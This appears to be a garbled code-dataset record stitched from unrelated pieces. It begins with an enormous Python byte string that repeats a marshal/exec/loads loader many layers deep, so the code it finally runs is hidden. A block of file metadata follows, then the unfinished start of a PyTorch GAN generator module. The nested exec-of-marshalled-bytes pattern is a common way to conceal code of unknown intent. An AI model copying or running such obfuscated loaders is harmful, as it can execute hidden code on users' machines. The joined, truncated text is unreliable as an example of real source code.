05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00
\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x
04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x
00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00
\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x
00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module
[... payload truncated: the remainder of the byte string repeats the same short marshal/exec loader code object verbatim (constant pool "marshal", "exec", "loads", module name "<module>") for hundreds of nesting layers ...]'))
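Because the record above is an opaque, layered payload, a short worked example of how one layer of this marshal/exec obfuscation can be inspected may help. This is a minimal sketch, assuming CPython (marshal data is interpreter-version-specific); the names payload and unwrap_one_layer are illustrative, not taken from the record, and the point is to disassemble a layer rather than exec() untrusted bytes.

import dis
import marshal

def unwrap_one_layer(payload):
    # marshal.loads() reverses marshal.dumps(); it only works on the
    # same CPython version that produced the payload
    code = marshal.loads(payload)
    dis.dis(code)  # show the layer's bytecode (typically: import marshal; exec(marshal.loads(...)))
    # the next layer's marshalled payload is usually stored in the code object's constants
    return [c for c in code.co_consts if isinstance(c, bytes)]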
| 97,759.5
| 195,504
| 0.774794
| 41,964
| 195,519
| 3.609117
| 0.028739
| 0.512634
| 0.527926
| 0.526025
| 0.88821
| 0.883825
| 0.881171
| 0.878636
| 0.875962
| 0.874238
| 0
| 0.409296
| 0.00044
| 195,519
| 2
| 195,504
| 97,759.5
| 0.365665
| 0
| 0
| 0
| 0
| 2
| 0.612198
| 0.61116
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
|
0
| 23
|
9bd7068451b4833f4f9ec4e11d861a50f33543f5
| 9,673
|
py
|
Python
|
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np

from utils import to_var


class Generator_FC(nn.Module):
    def __init__(self, nout):
        super(Generator_FC, self).__init__()
        self.l1 = nn.Sequential(
            nn.Linear(64, 1024),
            nn.BatchNorm1d(1024),
            nn.LeakyReLU(0.02),
            nn.Linear(1024, 1024),
            nn.BatchNorm1d(1024),
            nn.LeakyReLU(0.02),
            nn.Linear(1024, nout),
            nn.Tanh())

    def forward(self, z):
        out = self.l1(z)
        return out


class Generator_ConvCifar(nn.Module):
    def __init__(self, batch_size, nz, num_steps_total=1):
        super(Generator_ConvCifar, self).__init__()
        self.batch_size = batch_size
        self.nz = nz
        self.l1 = nn.Sequential(
            nn.Linear(nz, 512 * 4 * 4))
        self.l2 = nn.Sequential(
            nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1))
        # note: the second positional argument of BatchNorm2d is eps, so this sets eps=1.0
        self.bn1 = nn.BatchNorm2d(256, 1)
        self.l3 = nn.Sequential(
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1))
        self.bn2 = nn.BatchNorm2d(128)
        self.l4 = nn.Sequential(
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1))
        self.bn3 = nn.BatchNorm2d(128)
        self.l5 = nn.Sequential(
            nn.LeakyReLU(0.2),
            nn.Upsample(scale_factor=2),
            nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1))
